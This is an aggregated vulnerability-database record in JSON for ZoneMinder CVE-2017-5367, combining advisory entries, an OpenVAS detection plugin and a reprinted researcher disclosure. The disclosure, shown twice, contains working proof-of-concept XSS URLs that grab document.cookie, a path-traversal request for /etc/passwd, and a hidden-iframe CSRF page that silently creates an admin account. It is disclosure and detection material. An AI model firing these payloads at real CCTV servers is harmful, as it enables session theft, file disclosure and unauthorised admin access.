Multiple reflected XSS vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view=postlogin[XSS] view=console[XSS] view=groups[XSS] view=events&filter[terms][1][cnj]=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit=1%22%3E%3C/a%3E[XSS] (among others).
{"debiancve": [{"lastseen": "2023-12-03T18:32:05", "description": "Multiple reflected XSS vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view=postlogin[XSS] view=console[XSS] view=groups[XSS] view=events&filter[terms][1][cnj]=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit=1%22%3E%3C/a%3E[XSS] (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-02-06T17:59:00", "type": "debiancve", "title": "CVE-2017-5367", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5367"], "modified": "2017-02-06T17:59:00", "id": "DEBIANCVE:CVE-2017-5367", "href": "https://security-tracker.debian.org/tracker/CVE-2017-5367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "prion": [{"lastseen": "2023-11-22T03:15:22", "description": "Multiple reflected XSS 
vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view=postlogin[XSS] view=console[XSS] view=groups[XSS] view=events&filter[terms][1][cnj]=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit=1%22%3E%3C/a%3E[XSS] (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-02-06T17:59:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5367"], "modified": "2017-02-10T02:59:00", "id": "PRION:CVE-2017-5367", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-5367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ubuntucve": [{"lastseen": "2023-12-03T14:45:35", "description": "Multiple reflected XSS vulnerabilities exist within form and link input\nparameters of ZoneMinder v1.30 and v1.29, an 
open-source CCTV server web\napplication, which allows a remote attacker to execute malicious scripts\nwithin an authenticated client's browser. The URL is /zm/index.php and\nsample parameters could include action=login&view=postlogin[XSS]\nview=console[XSS] view=groups[XSS]\nview=events&filter[terms][1][cnj]=and[XSS]\nview=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS]\nview=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and\nview=events&limit=1%22%3E%3C/a%3E[XSS] (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-02-06T00:00:00", "type": "ubuntucve", "title": "CVE-2017-5367", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5367"], "modified": "2017-02-06T00:00:00", "id": "UB:CVE-2017-5367", "href": "https://ubuntu.com/security/CVE-2017-5367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2023-12-03T15:29:05", "description": "Multiple reflected XSS vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an 
authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view=postlogin[XSS] view=console[XSS] view=groups[XSS] view=events&filter[terms][1][cnj]=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit=1%22%3E%3C/a%3E[XSS] (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-02-06T17:59:00", "type": "cve", "title": "CVE-2017-5367", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5367"], "modified": "2017-02-10T02:59:00", "cpe": ["cpe:/a:zoneminder:zoneminder:1.29.0", "cpe:/a:zoneminder:zoneminder:1.30.0"], "id": "CVE-2017-5367", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:zoneminder:zoneminder:1.29.0:*:*:*:*:*:*:*", "cpe:2.3:a:zoneminder:zoneminder:1.30.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T17:09:54", "description": "ZoneMinder is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-02-06T00:00:00", "type": 
"openvas", "title": "ZoneMinder Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5368", "CVE-2017-5367", "CVE-2017-5595"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310106564", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106564", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ZoneMinder Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zoneminder:zoneminder\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106564\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-02-06 09:54:32 +0700 (Mon, 06 Feb 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2017-5595\", \"CVE-2017-5367\", \"CVE-2017-5368\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"ZoneMinder Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_zoneminder_detect.nasl\", \"os_detection.nasl\");\n script_require_keys(\"Host/runs_unixoide\");\n script_mandatory_keys(\"zoneminder/installed\");\n\n script_tag(name:\"summary\", value:\"ZoneMinder is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Tries to read the /etc/passwd file.\");\n\n script_tag(name:\"insight\", value:\"ZoneMinder is prone to multiple vulnerabilities:\n\n - File disclosure and inclusion vulnerability exists due to unfiltered user-input being passed to readfile() in\n views/file.php which allows an authenticated attacker to read local system files (e.g. /etc/passwd) in the\n context of the web server user (www-data). 
(CVE-2017-5595)\n\n - Multiple reflected XSS (CVE-2017-5367)\n\n - CSRF vulnerability since no CSRF protection exists across the entire web app. (CVE-2017-5368)\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated remote attacker may read arbitrary files.\");\n\n script_tag(name:\"solution\", value:\"Update to version 1.30.2 or later.\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2017/Feb/11\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nfiles = traversal_files(\"linux\");\n\nforeach pattern(keys(files)) {\n\n file = files[pattern];\n\n url = dir + \"/index.php?view=file&path=/../../../../../\" + file;\n\n if (http_vuln_check(port: port, url: url, pattern: pattern, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-04T23:35:20", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2017-02-05T00:00:00", "type": "zdt", "title": "ZoneMinder - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5368", "CVE-2016-10140", "CVE-2017-5367", "CVE-2017-5595"], "modified": "2017-02-05T00:00:00", "id": "1337DAY-ID-26901", "href": "https://0day.today/exploit/description/26901", "sourceData": "==========================================================================\r\nProduct: ZoneMinder\r\nVersions: Multiple versions - see inline\r\nVulnerabilities: File disclosure, XSS, CSRF, Auth bypass & Info disclosure\r\nCVE-IDs: CVE-2017-5595, CVE-2017-5367, CVE-2017-5368, CVE-2016-10140\r\nAuthor: John 
Marzella\r\nDate: 03/02/2017\r\n==========================================================================\r\n\r\n\r\n\r\nCVE-2016-10140 - Auth bypass and Info disclosure - affects v1.30 and v1.29\r\n==========================================================================\r\nContacted vendor on 08/11/2016\r\n\r\nApache HTTP Server configuration bundled with ZoneMinder allows a remote unauthenticated attacker to browse all directories in the web root, e.g., a remote unauthenticated attacker can view all CCTV images on the server.\r\n\r\nPoC: http://<serverIP>/events\r\n\r\nFix: https://github.com/ZoneMinder/ZoneMinder/commit/71898df7565ed2a51dfe76a1cf30ddb81fc888ba\r\n\r\n\r\n\r\nCVE-2017-5595 - File disclosure - affects v1.xx - code from 2008\r\n================================================================\r\nContacted vendor on 22/01/2017\r\n\r\nFile disclosure and inclusion vulnerability exists in ZoneMinder v1.30.0 due to unfiltered user-input being passed to readfile() in views/file.php which allows an authenticated attacker to read local system files (e.g. 
/etc/passwd) in the context of the web server user (www-data).\r\n\r\nPoC: http://<serverIP>/zm/index.php?view=file&path=/../../../../../etc/passwd\r\n\r\nFix: https://github.com/ZoneMinder/ZoneMinder/commit/8b19fca9927cdec07cc9dd09bdcf2496a5ae69b3\r\n\r\n\r\n\r\nCVE-2017-5367 - XSS - affects v1.30 and v1.29\r\n=============================================\r\nContacted vendor on 20/11/2016\r\n\r\nMultiple reflected XSS exists.\r\n\r\nThe following has been injected into vulnerable URL\u2019s to show that the users session cookie can be stolen.\r\n%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn form input view using POST at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/index.php?action=login&view=postlogin%3Cscript%3Ealert(document.cookie);%3C/script%3E&postLoginQuery=1&username=testuser&password=testpassword\r\n\r\nIn link input view using GET at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=groups%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn link input filter[terms][1][cnj] using GET at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=events&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bhour&filter[terms][1][cnj]=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter[terms][1][attr]=MonitorId&filter[terms][1][op]=%3D&filter[terms][1][val]=1\r\n\r\nIn form input view using GET at http://<serverIP>/zm/index.php\r\nPoC: http://<serverIP>/zm/index.php?view=console%3Cscript%3Ealert(document.cookie);%3C/script%3E&action=1&addBtn=Add%20New%20Monitor&editBtn=Edit&deleteBtn=Delete&markMids[]=2\r\n\r\nIn form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/index.php PoC: 
http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=Archived&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=1&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B1%5D%5Bval%5D=1\r\n\r\nIn form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1+hour&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=%3Cscript%3Ealert(document.cookie);%3C/script%3Eand&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D==&filter%5Bterms%5D%5B1%5D%5Bval%5D=1\r\n\r\nIn form input limit using POST at http://<serverIP>/zm/index.php\r\nPoC: http://<serverIP>/zm/index.php?view=events&action=1&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bmonth&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn link input limit using GET at http://<serverIP>/zm/index.php\r\nPoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3E%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1%2Bmonth&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn form input limit using POST at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=events&action=1&page=1&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn link input limit using GET at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=events&page=1&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\n\r\n\r\nCVE-2017-5368 - CSRF - affects v1.30 and 
v1.29\r\n==============================================\r\nContacted vendor on 20/11/2016\r\n\r\nNo CSRF protection exists across entire web app.\r\n\r\nPoC: The following html page silently adds a new admin user to Zoneminder if the admin user is already logged in.\r\n\r\ncsrf_poc_addUser.html\r\n\r\n<!-- Example of silent CSRF using iframe -->\r\n<iframe style=\"display:none\" name=\"csrf-frame\"></iframe>\r\n<form method='POST' action=\"http://<serverIP>/zm/index.php\" target=\"csrf-frame\" id=\"csrf-form\">\r\n<input type=\"hidden\" name=\"view\" value=\"user\"/>\r\n<input type=\"hidden\" name=\"action\" value=\"user\"/>\r\n<input type=\"hidden\" name=\"uid\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"newUser[MonitorIds]\" value=\"\"/>\r\n<input type=\"hidden\" name=\"newUser[Username]\" value=\"attacker1\"/>\r\n<input type=\"hidden\" name=\"newUser[Password]\" value=\"Password1234\"/>\r\n<input type=\"hidden\" name=\"conf_password\" value=\"Password1234\"/>\r\n<input type=\"hidden\" name=\"newUser[Language]\" value=\"en_gb\"/>\r\n<input type=\"hidden\" name=\"newUser[Enabled]\" value=\"1\"/>\r\n<input type=\"hidden\" name=\"newUser[Stream]\" value=\"View\"/>\r\n<input type=\"hidden\" name=\"newUser[Events]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[Control]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[Monitors]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[Groups]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[System]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[MaxBandwidth]\" value=\"high\"/>\r\n</form>\r\n<script>document.getElementById(\"csrf-form\").submit()</script>\n\n# 0day.today [2018-04-04] #", "sourceHref": "https://0day.today/exploit/26901", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2017-02-08T05:04:31", "description": "", "cvss3": {}, "published": "2017-02-06T00:00:00", "type": 
"packetstorm", "title": "ZoneMinder XSS / CSRF / File Disclosure / Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5368", "CVE-2016-10140", "CVE-2017-5367", "CVE-2017-5595"], "modified": "2017-02-06T00:00:00", "id": "PACKETSTORM:140927", "href": "https://packetstormsecurity.com/files/140927/ZoneMinder-XSS-CSRF-File-Disclosure-Authentication-Bypass.html", "sourceData": "`========================================================================== \nProduct: ZoneMinder \nVersions: Multiple versions - see inline \nVulnerabilities: File disclosure, XSS, CSRF, Auth bypass & Info disclosure \nCVE-IDs: CVE-2017-5595, CVE-2017-5367, CVE-2017-5368, CVE-2016-10140 \nAuthor: John Marzella \nDate: 03/02/2017 \n========================================================================== \n \n \n \nCVE-2016-10140 - Auth bypass and Info disclosure - affects v1.30 and v1.29 \n========================================================================== \nContacted vendor on 08/11/2016 \n \nApache HTTP Server configuration bundled with ZoneMinder allows a remote unauthenticated attacker to browse all directories \nin the web root, e.g., a remote unauthenticated attacker can view all CCTV images on the server. \n \nPoC: http://<serverIP>/events \n \nFix: https://github.com/ZoneMinder/ZoneMinder/commit/71898df7565ed2a51dfe76a1cf30ddb81fc888ba \n \n \n \nCVE-2017-5595 - File disclosure - affects v1.xx - code from 2008 \n================================================================ \nContacted vendor on 22/01/2017 \n \nFile disclosure and inclusion vulnerability exists in ZoneMinder v1.30.0 due to unfiltered user-input being passed to readfile() in views/file.php which allows an authenticated attacker to read local system files (e.g. /etc/passwd) in the context of the web server user (www-data). 
\n \nPoC: http://<serverIP>/zm/index.php?view=file&path=/../../../../../etc/passwd \n \nFix: https://github.com/ZoneMinder/ZoneMinder/commit/8b19fca9927cdec07cc9dd09bdcf2496a5ae69b3 \n \n \n \nCVE-2017-5367 - XSS - affects v1.30 and v1.29 \n============================================= \nContacted vendor on 20/11/2016 \n \nMultiple reflected XSS exists. \n \nThe following has been injected into vulnerable URLs to show that the user's session cookie can be stolen. \n%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn form input view using POST at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/index.php?action=login&view=postlogin%3Cscript%3Ealert(document.cookie);%3C/script%3E&postLoginQuery=1&username=testuser&password=testpassword \n \nIn link input view using GET at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=groups%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn link input filter[terms][1][cnj] using GET at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=events&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bhour&filter[terms][1][cnj]=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter[terms][1][attr]=MonitorId&filter[terms][1][op]=%3D&filter[terms][1][val]=1 \n \nIn form input view using GET at http://<serverIP>/zm/index.php \nPoC: http://<serverIP>/zm/index.php?view=console%3Cscript%3Ealert(document.cookie);%3C/script%3E&action=1&addBtn=Add%20New%20Monitor&editBtn=Edit&deleteBtn=Delete&markMids[]=2 \n \nIn form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/index.php \nPoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=Archived&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=1&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B1%5D%5Bval%5D=1 \n \nIn form input 
filter[terms][1][cnj] using POST at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1+hour&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=%3Cscript%3Ealert(document.cookie);%3C/script%3Eand&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D==&filter%5Bterms%5D%5B1%5D%5Bval%5D=1 \n \nIn form input limit using POST at http://<serverIP>/zm/index.php \nPoC: http://<serverIP>/zm/index.php?view=events&action=1&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bmonth&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn link input limit using GET at http://<serverIP>/zm/index.php \nPoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3E%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1%2Bmonth&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn form input limit using POST at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=events&action=1&page=1&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn link input limit using GET at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=events&page=1&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \n \n \nCVE-2017-5368 - CSRF - affects v1.30 and v1.29 \n============================================== \nContacted vendor on 20/11/2016 \n \nNo CSRF protection exists across entire web app. \n \nPoC: The following html page silently adds a new admin user to Zoneminder if the admin user is already logged in. 
\n \ncsrf_poc_addUser.html \n \n<!-- Example of silent CSRF using iframe --> \n<iframe style=\"display:none\" name=\"csrf-frame\"></iframe> \n<form method='POST' action=\"http://<serverIP>/zm/index.php\" target=\"csrf-frame\" id=\"csrf-form\"> \n<input type=\"hidden\" name=\"view\" value=\"user\"/> \n<input type=\"hidden\" name=\"action\" value=\"user\"/> \n<input type=\"hidden\" name=\"uid\" value=\"0\"/> \n<input type=\"hidden\" name=\"newUser[MonitorIds]\" value=\"\"/> \n<input type=\"hidden\" name=\"newUser[Username]\" value=\"attacker1\"/> \n<input type=\"hidden\" name=\"newUser[Password]\" value=\"Password1234\"/> \n<input type=\"hidden\" name=\"conf_password\" value=\"Password1234\"/> \n<input type=\"hidden\" name=\"newUser[Language]\" value=\"en_gb\"/> \n<input type=\"hidden\" name=\"newUser[Enabled]\" value=\"1\"/> \n<input type=\"hidden\" name=\"newUser[Stream]\" value=\"View\"/> \n<input type=\"hidden\" name=\"newUser[Events]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[Control]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[Monitors]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[Groups]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[System]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[MaxBandwidth]\" value=\"high\"/> \n</form> \n<script>document.getElementById(\"csrf-form\").submit()</script> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/140927/zoneminder_03022017.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "mageia": [{"lastseen": "2023-12-03T17:33:21", "description": "This update fixes the following security issues: Information disclosure and authentication bypass vulnerability exists in the Apache HTTP Server configuration bundled with ZoneMinder v1.30 and v1.29, which allows a remote unauthenticated attacker to browse all directories in the web root, e.g., a remote unauthenticated attacker can view all CCTV images on the server via the /events URI. 
(CVE-2016-10140) Cross-site scripting (XSS) vulnerability in Zoneminder 1.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the format parameter in a download log request to index.php. (CVE-2016-10201) Cross-site scripting (XSS) vulnerability in Zoneminder 1.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the path info to index.php. (CVE-2016-10202) Cross-site scripting (XSS) vulnerability in Zoneminder 1.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the name when creating a new monitor. (CVE-2016-10203) SQL injection vulnerability in Zoneminder 1.30 and earlier allows remote attackers to execute arbitrary SQL commands via the limit parameter in a log query request to index.php. (CVE-2016-10204) Session fixation vulnerability in Zoneminder 1.30 and earlier allows remote attackers to hijack web sessions via the ZMSESSID cookie. (CVE-2016-10205) Cross-site request forgery (CSRF) vulnerability in Zoneminder 1.30 and earlier allows remote attackers to hijack the authentication of users for requests that change passwords and possibly have unspecified other impact as demonstrated by a crafted user action request to index.php. (CVE-2016-10206) Multiple reflected XSS vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view=postlogin[XSS] 